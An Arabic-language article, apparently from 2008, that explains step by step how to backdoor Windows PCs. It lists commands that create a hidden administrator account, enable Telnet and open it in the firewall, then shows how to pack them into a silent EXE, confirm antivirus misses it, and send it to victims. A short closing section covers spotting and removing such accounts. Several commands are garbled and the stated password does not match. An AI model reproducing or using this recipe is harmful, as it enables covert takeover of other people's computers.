لطريقة المبتكرة لا
الطريقة المبتكرة لاختراق الأنظمة بعد فشل الفيروسات وأعوانها - 2
2008-01-05الاختراق السهل الممتنع
تعتمد كافة طرق الاختراق المعروفة على استغلال ثغرة أمنية في مستويات نظام الحماية أو مخادعة أجهزة وأنظمة المراقبة والجدران النارية. أما الطريقة التي سنتعرف عليها عبر الفقرات الآتية والتي أصبحت مشاع الكترونيا متداولا بين القراصنة, تعد طريقة مبتكرة تعتمد على ثغرة خطيرة جدا ليسن في مستويات الحماية ولكنها في نظام الويندوز نفسه.
فعلى الرغم من كل التعقيدات إلا أن نظام الويندوز اغفل نقطة مهمة جدا وهي أن سجلات النظام نفسها غير محمية ويمكن بكل سهولة التعديل عليها بالإضافة أو الحذف بمعنى آخر جميع مفاتيح الأمان الخاص بالويندوز مخزنة داخل سجلات النظام ولكن سجلات النظام نفسها لا تمتلك اس مستوى حماية مثل الباب المفتوح وبالتالي يمكن لأي شخص الوصول إلى تلك السجلات واخذ المفتاح الذي يشأ دون أي رقيب أو حسيب. قد تكون ثغرة سجلات النظام معروفة للكثيرين وهذا ما دفع بعض مبرمجي ملفات التجسس للاعتماد على سجلات النظام كمصدر رئيسي للمعلومات التي يبحثون عنها أو حتى إضافة بعض القيم داخل السجلات من اجل فتح الأبواب المغلقة وحتى الفيروسات التخريب والدمار وجدت ضالتها في سجلات النظام لتعكر صفوة المستخدمين بحجب بعض الخدمات عنهم ومنعهم من استكمال إعمالهم بطريقة طبيعية كما هو الحال في الفيروس الذي يعمل على تعطيل خيار إظهار الملفات المخفية للأبد.
فكرة الاختراق السهل الممتنع
تتلخص فكرة الاختراق السهل الممتنع باستغلال ثغرة سجلات النظام المفتوحة من اجل إنشاء حساب مستخدم جديد يمتلك صلاحيات كاملة Administrator بكلمة سر محددة ثم منح المستخدم صلاحيات التحكم عن بعد بجهاز الكمبيوتر وفتح المنافذ المطلوبة وفي النهاية تسجيل المستخدم الجديد ضمن سجلات النظام حتى يكون مستخدما شرعيا وموثوقا من قبل نظام التشغيل.
الفكرة من حيث المبدأ سهلة ويمكننا تطبيقها بكل سهولة لو كنا نعمل على الجهاز الهدف ولكن وجه التعقيد في هذه الفكرة إننا لا نستطيع الوصول إلى الجهاز ولا يمكننا العمل عليه مباشرة لذلك سنلجأ إلى الحيلة القديمة التي تتلخص بتصميم برنامج ينوب عنا ليكمل المهمة المطلوبة وهنا تكمن المشكلة فإذا اعتمدنا على السكربتات المخصصة لصناعة ملفات التجسس بهدف صياغة أوامر البرنامج, فلن نحصل على شيء بمجرد وصول الملف إلى جهاز الضحية سينكشف أمره ولن يصمد في وجه مضاد الفيروسات ثانية واحدة.
سينكشف أمره ولن يصمد في وجه مضاد الفيروسات ثانية واحدة. ولكن بالجمع ما بين القديم والحديث, استطاع القراصنة صناعة ملفات اختراق تتمتع بالشرعية اللازمة لكي لا يعترض عليها أيا من أنظمة الحماية والجدير بالذكر أن هذه الملفات لا تحتوي على أي سكربت من السكربتات المحظورة. إذ اعتمدوا في بناء البرنامج بصورة أساسية على أوامر الدوس Dos القديمة بالإضافة لأمر تسجيل قيم جديدة ضمن سجلات النظام. هناك سبع خطوات او تعليمات يجب اتمامها للقيام بالإختراق و هي:
- التعليمة الأولى net user Baby_Hacker Zeroone/add وهي لإنشاء مستخدم جديد يحمل الاسم Baby_Hacker بكلمة سر 123456 وبمجرد تنفيذ هذا الأمر سيتم إنشاء المستخدم الجديد.
- التعليمة الثانية net localgroup administrators Baby_Hacker/add يقوم هذا الأمر بضم المستخدم Baby_Hacker إلى مجموعة المستخدمين الذين يمتلكون حق الإدارة المطلقة Administrators بمعنى آخر منح المستخدم صلاحيات المدير.
- التعليمية الثالثة net localgroup"Remote desktop users " Baby_Hacker/add يختص هذا الأمر بمنح المستخدم Baby_Hacker صلاحيات الاتصال والتحكم عن بعد.
- التعليمة الرابعة sc config tlntsvr start=auto تمنح هذه التعليمة برنامج Telnet المسؤول عن عملية الاتصال عن بعد, خاصية التشغيل الأوتوماتيكي.
- التعليمة الخامسة netsh firewall set allowedprogram%windir%system32 lntsvr.exe iexplorer enable وهنا أصدرنا أمر للجدار الناري بالسماح لبرنامج Telnet أن يمارس مهامه دون أي اعتراض.
- التعليمة السادسة sc start tlntsvr في حين عملنا على تشغيل برنامج الـ Telnet ( طبعا البرنامج يعمل بالخفاء كخدمة من خدمات الشبكات).
- لتعليمة السابعة reg add "HKLMsoftwaremicrosoftwindows NTCurrent Version WinlogonspecialaccountsUserList"/v Baby_Hacker/t REG_DWORD/d 0 وهذه هي تعليمة تسجيل المستخدم ضمن سجلات النظام حتى يصبح مستخدما شرعيا وموثوقا.
بعد أن تعرفنا على تفصيل النص البرمجي لا بد لنا من إيجاد طريقة ما لتطبيق النص وتحويله إلى برنامج قابل للتنفيذ, من بين الأفكار التي يلجا إليها القراصنة لإتمام المهمة هي فكرة صناعة ملف Batch بحيث تعمل على صياغة النص السابق داخل محرر النصوص Notepad لتخزين الملف بعدها بأي اسم كان شرط أن يكون امتداده Bat لكن المشكلة في ملفات الـ Batch أنها عرضة لشك ومن المتوقع أن تحمل في طياتها خطر ما لذلك نجد أن المستخدمين يتجنبون فتحها إلا بعد التأكد من محتواها وحتى إذا لم يشك المستخدم في محتوى الملف فمجرد تشغيلها ستظهر للمستخدم شاشة الدوس السوداء سرعان ما أن تختفي مما يدفع المستخدم للشك.
أما الطريقة الاكثر حرفية وشيوعا لتصميم البرنامج فهي من خلال تحويل النص البرمجي إلى تطبيق يحمل الامتداد EXE ودمجه مع أي برنامج آخر أو ضغطه بواسطة برنامج Winar على هيئة ملف ذاتي التنفيذ أو حتى استخدامه منفردا مع ضرورة تعطيل ظهور أية واجهة للتطبيق تنفيذي يعمل في الخفاء. يمكننا تحويل النص البرمجي إلى تطبيق تنفيذي يعمل في الخفاء بأكثر من طريقة بحسب خبرات الشخص المنفذ ولنتبع أسهل وأسرع الطرق كما هو مبين في الخطوات التالية:
- في البداية علينا الاستعانة بأحد برامج إنتاج التطبيقات التنفيذية مثل Quick Batch والذي يمكنك تحميل نسخته من خلال الضغط هنا Quick Batch علما بان حجم البرنامج يبلغ 1.03 ميغابايت.
- بعد الانتهاء من تحميل وتنصيب البرنامج اعمل على تشغيله ثم اعمل على صياغة النص البرمجي السابق داخل واجهة التحرير
- انقر بعد ذلك على أيقونة Option ثم اختر خاصية التطبيق المخفي Ghost Application
- انقر مفتاح التبويب Customize Resources ثم امنح البرنامج وصفا ورقم الإصدار ورقم بتحديد أيقونة البرنامج ( علما بان هذه الخطوة اختيارية وليست إجبارية).
- الخطوة الأخيرة Build حيث سيطلب منا تحديد اسم ومسار تخزين التطبيق.
التأكد من البرنامج
يجب أن يكون البرنامج المنتج سليم وخالي مما يدل على انه ملف تجسس أو اختراق ويمكننا التأكد من ذلك بفحصه بواسطة أي برنامج مضاد للفيروسات. كما يمكننا التأكد من عمل البرنامج بتجريبه على احد الأجهزة الداخلية أو لا قبل إتمام المهمة. قبل تجربة البرنامج, استعرض معلومات المستخدمين المسجلين في جهازك وذلك بالضغط بزر الفارة الأيمن على أيقونة My computer واختيار الأمر Manage حيث سيظهر لك واجهة إدارة الكمبيوتر وبداخلها قائمة بأسماء المستخدمين.
بعدها, اعلق الواجهة واعمل على تنفيذ البرنامج ثم اعد الكرة مرة ثانية لاستعراض قائمة المستخدمين. لاحظ ظهور اسم المستخدم Baby_Hacker ضمن قائمة المستخدمين المسجلين كما ستجد نفس الاسم في كل من مجموعة Administrator وفي مجموعة Remote DiskTop بعد ذلك يمكنك التأكد من سجلات النظام لتجد أن المستخدم Baby_Hacker مسجل وموثق تأكد من أن خدمة برنامج Telnet تعمل بكفاءة دون أن يعترض عليها الجدار الناري. استعرض مدير المهام المفتوحة Task Manger وذلك بالضغط المتزامن على المفاتيح Ctrl+Alt+Delete ثم اختر مفتاح التبويب Processes لتجد أن خدمة Telnet فعالة على النحو التالي.
وتجدر الإشارة إلى أن النتائج السابقة, يحصل عليها قراصنة الانترنت إرسال الملف أعلاه إلى أي شخص وبذلك يصبح لديهم حساب خاص كامل الصلاحيات على الجهاز الضحية الذي أصبح بكامل محتوياته تحت تصرفهم بواسطة برنامج Telnet أو أي برامج آخر يختص بالتحكم عن بعد. فكل ما يحتاجونه لإتمام عملية التحكم هو الحصول على رقم الـ IP الخاص بالجهاز الضحية واسم المستخدم الذي يمتلك حق الاتصال عن بعد وكلمة السر الخاصة به وان تكون خدمة الاتصال مفعلة دون أن يعترض عليها الجدار الناري. علما بان البرنامج الجديد سيتكفل.
تتبع خيوط الاختراق والوقاية منها
بدت هذه الطريقة الأكثر انتشارا لاختراق الأنظمة كما إنها باتت مشاعا توفره الشبكة العنكبوتية لزواره, دون الإشارة إلى كيفية تتبع خيوط الجريمة والوقاية منها. يمكننا وبكل سهولة اكتشاف الحساب الدخيل بطريقة يدوية وذلك من خلال التوجه إلى أيقونة MY Computer والضغط عليها بالزر الأيمن للفارة واختيار Manage لتظهر لنا واجهة إدارة الكمبيوتر. من الجهة اليسرى لنافذة, اختر Local User ومن قائمتي User و Group تفحص أسماء المستخدمين واعمل على حذف الغريب منها وذلك بالضغط على الاسم بزر الفارة الايمن واختيار أمر Delete من القائمة المنسدلة. ولمزيد من الحماية, ينصح الخبراء بتعزيز الجدار الناري الذي يتضمنه الويندوز بتنصيب جدار نار آخر مساند له وذلك بالاستعانة بالبرامج المتخصصة.
كما يجب على المستخدمين تقيد صلاحيات الاتصال عن بعد وعدم الاكتفاء بالتحقيق من اسم المستخدم وكلمة السر. كان يشترط عبر إعدادات Firewall وجود عنوان IP Address ثابت ( حقيقي) وموثق للجدار الناري. كما يمكنه تعقيد العملية أكثر, باشتراط عملية التحقق من MAC Address للجهاز المتصل, قبل إعطائه صلاحيات التحكم عن بعد. وأخيرا وليس أخرا, ينصح الخبراء بتعطيل حساب المدير العام Administrator الذي قد تعتمد عليه الفئة المتقدمة من القراصنة لإتمام عملية الاختراق بعد تعديلهم لقيمه.